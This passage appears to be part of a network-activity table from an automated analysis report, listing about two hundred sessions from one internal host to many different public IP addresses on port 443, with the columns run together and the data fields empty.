                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19606192.168.2.144641643.253.107.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19607192.168.2.1444822211.112.178.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19608192.168.2.145628862.75.255.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19609192.168.2.1439292155.112.4.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19610192.168.2.1453638208.180.15.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19611192.168.2.145210279.162.72.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19612192.168.2.143808670.210.64.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19613192.168.2.145405298.209.72.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19614192.168.2.143718696.53.212.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19615192.168.2.1457070181.200.111.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19616192.168.2.1452332165.228.149.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19617192.168.2.1450922105.222.143.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19618192.168.2.1459806220.48.126.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19619192.168.2.143357874.162.248.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19620192.168.2.145201264.168.129.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19621192.168.2.1447778140.250.24.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19622192.168.2.144042051.120.44.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19623192.168.2.1438516149.178.175.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19624192.168.2.145954654.58.215.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19625192.168.2.1451744134.48.55.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19626192.168.2.1458744131.202.84.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19627192.168.2.1440164181.75.250.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19628192.168.2.1448500183.140.200.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19629192.168.2.145707241.244.36.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19630192.168.2.1433246204.98.72.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19631192.168.2.1436910104.48.96.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19632192.168.2.1436592141.239.16.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19633192.168.2.145877042.99.247.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19634192.168.2.1454218141.211.41.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19635192.168.2.145233027.29.23.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19636192.168.2.1451086120.173.77.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19637192.168.2.1452992177.84.191.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19638192.168.2.1442944158.179.216.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19639192.168.2.1438182135.114.84.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19640192.168.2.1448252106.161.194.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19641192.168.2.144984865.73.32.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19642192.168.2.1439230188.8.176.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19643192.168.2.1443104137.125.73.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19644192.168.2.144646638.65.14.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19645192.168.2.1442632101.27.18.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19646192.168.2.1444822206.2.3.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19647192.168.2.144856267.18.185.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19648192.168.2.1456400176.155.209.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19649192.168.2.144750296.237.255.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19650192.168.2.1438244205.146.172.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19651192.168.2.1448282145.222.102.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19652192.168.2.1443988216.50.115.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19653192.168.2.143598864.9.220.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19654192.168.2.1452810114.214.71.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19655192.168.2.1457746109.140.64.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19656192.168.2.1435564133.162.164.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19657192.168.2.1438966195.117.150.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19658192.168.2.144744249.130.217.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19659192.168.2.143482694.103.76.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19660192.168.2.143642025.92.202.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19661192.168.2.145121293.177.219.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19662192.168.2.143768877.104.66.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19663192.168.2.1456186153.185.114.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19664192.168.2.1440258112.108.147.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19665192.168.2.1456282171.179.83.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19666192.168.2.145060036.192.220.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19667192.168.2.145133042.4.29.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19668192.168.2.14360284.154.61.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19669192.168.2.143597213.193.231.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19670192.168.2.1455544175.207.33.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19671192.168.2.14333249.120.1.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19672192.168.2.1434684151.186.225.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19673192.168.2.1437188200.230.175.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19674192.168.2.1443680160.202.77.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19675192.168.2.145893285.79.219.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19676192.168.2.1456884177.235.50.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19677192.168.2.1445894136.255.105.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19678192.168.2.1447450162.143.36.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19679192.168.2.1451502158.16.169.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19680192.168.2.1444246158.90.33.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19681192.168.2.143900814.113.96.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19682192.168.2.145488653.150.104.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19683192.168.2.1445268204.223.245.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19684192.168.2.145188045.144.93.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19685192.168.2.1434892137.119.238.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19686192.168.2.1453512198.27.7.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19687192.168.2.1441390121.3.94.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19688192.168.2.145339889.41.183.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19689192.168.2.1449724175.85.75.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19690192.168.2.1459582179.74.177.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19691192.168.2.145410442.31.138.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19692192.168.2.1446146199.128.50.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19693192.168.2.1434322123.190.169.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19694192.168.2.144868092.236.114.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19695192.168.2.1444818114.251.22.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19696192.168.2.1437774147.209.210.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19697192.168.2.1452946112.73.165.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19698192.168.2.1450946140.174.104.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19699192.168.2.1460664100.171.46.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19700192.168.2.1454934193.134.129.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19701192.168.2.144683453.182.215.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19702192.168.2.144607478.174.254.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19703192.168.2.1454184213.0.121.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19704192.168.2.1445616169.150.37.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19705192.168.2.143721025.77.40.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19706192.168.2.144523817.63.119.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19707192.168.2.1454242167.39.166.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19708192.168.2.1435406179.1.70.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19709192.168.2.145670817.184.150.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19710192.168.2.1458116113.96.153.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19711192.168.2.144426218.194.111.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19712192.168.2.144954249.39.73.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19713192.168.2.1438388161.87.254.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19714192.168.2.143411219.183.59.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19715192.168.2.143397037.98.1.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19716192.168.2.143617279.16.155.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19717192.168.2.1448054212.57.244.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19718192.168.2.1454582132.97.243.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19719192.168.2.1434988174.169.180.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19720192.168.2.1440938200.147.72.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19721192.168.2.1444996159.223.72.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19722192.168.2.144677292.217.14.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19723192.168.2.1433934169.250.100.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19724192.168.2.1456164210.56.35.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19725192.168.2.143716244.18.11.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19726192.168.2.1454034140.140.154.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19727192.168.2.1435878118.10.249.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19728192.168.2.14536189.118.196.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19729192.168.2.1436776129.97.134.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19730192.168.2.1460376108.111.42.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19731192.168.2.146003892.119.144.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19732192.168.2.1458144120.79.6.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19733192.168.2.1454704203.136.171.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19734192.168.2.1446372198.129.239.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19735192.168.2.146004453.104.71.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19736192.168.2.145384873.218.152.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19737192.168.2.14425861.159.255.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19738192.168.2.1440580199.177.147.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19739192.168.2.144152647.185.25.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19740192.168.2.1450306201.227.107.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19741192.168.2.1441130181.187.17.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19742192.168.2.1434362186.186.248.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19743192.168.2.144120835.202.151.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19744192.168.2.144728832.101.198.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19745192.168.2.145707665.26.136.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19746192.168.2.1438888123.145.128.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19747192.168.2.1444824172.250.110.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19748192.168.2.1443614160.194.241.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19749192.168.2.1450128198.249.252.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19750192.168.2.1449564205.176.235.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19751192.168.2.1460720128.127.148.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19752192.168.2.145326875.73.23.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19753192.168.2.145937423.226.96.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19754192.168.2.14443229.18.208.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19755192.168.2.1438990198.100.80.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19756192.168.2.1438218149.205.225.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19757192.168.2.1459238200.34.45.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19758192.168.2.1432848208.237.89.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19759192.168.2.144301675.232.154.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19760192.168.2.144699432.70.233.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19761192.168.2.1448110133.230.146.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19762192.168.2.1451404211.255.217.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19763192.168.2.145060437.132.88.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19764192.168.2.1438154109.4.224.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19765192.168.2.1449240129.48.204.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19766192.168.2.1449998175.13.28.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19767192.168.2.1457720112.118.25.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19768192.168.2.1452200120.32.196.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19769192.168.2.145759441.41.159.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19770192.168.2.1436270188.216.16.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19771192.168.2.1460742115.218.204.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19772192.168.2.1459576122.220.207.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19773192.168.2.1441008218.27.115.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19774192.168.2.1438426100.145.95.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19775192.168.2.143866666.216.224.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19776192.168.2.144735869.133.184.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19777192.168.2.144710845.188.77.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19778192.168.2.145282234.44.187.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19779192.168.2.1457824129.67.201.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19780192.168.2.1449886130.169.225.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19781192.168.2.146093441.153.87.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19782192.168.2.144813457.148.18.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19783192.168.2.14554448.228.116.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19784192.168.2.1458214129.131.15.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19785192.168.2.1450322190.22.29.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19786192.168.2.1450004183.106.19.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19787192.168.2.145966014.209.204.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19788192.168.2.144408899.151.134.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19789192.168.2.144894463.208.173.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19790192.168.2.144320675.24.228.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19791192.168.2.1442096129.97.130.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19792192.168.2.144311879.28.217.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19793192.168.2.1434048205.124.103.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19794192.168.2.146045470.245.219.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19795192.168.2.143850214.128.179.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19796192.168.2.1460894206.106.214.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19797192.168.2.1435936143.138.170.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19798192.168.2.1434578192.21.178.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19799192.168.2.1457826193.26.119.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19800192.168.2.1434462220.169.227.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19801192.168.2.144882232.119.77.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19802192.168.2.1455536156.39.49.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19803192.168.2.1450882151.187.5.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19804192.168.2.144810858.65.212.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19805192.168.2.144671836.223.0.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19806192.168.2.1437876197.252.157.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19807192.168.2.143283284.251.233.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19808192.168.2.144930840.233.35.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19809192.168.2.145252236.12.191.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19810192.168.2.1459830115.107.158.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19811192.168.2.1450620126.6.164.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19812192.168.2.1436418153.198.227.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19813192.168.2.1448870222.174.130.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19814192.168.2.1442654114.242.15.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19815192.168.2.145335695.114.121.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19816192.168.2.145007439.114.47.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19817192.168.2.145169840.93.92.212443
                                                      TimestampBytes transferredDirectionData


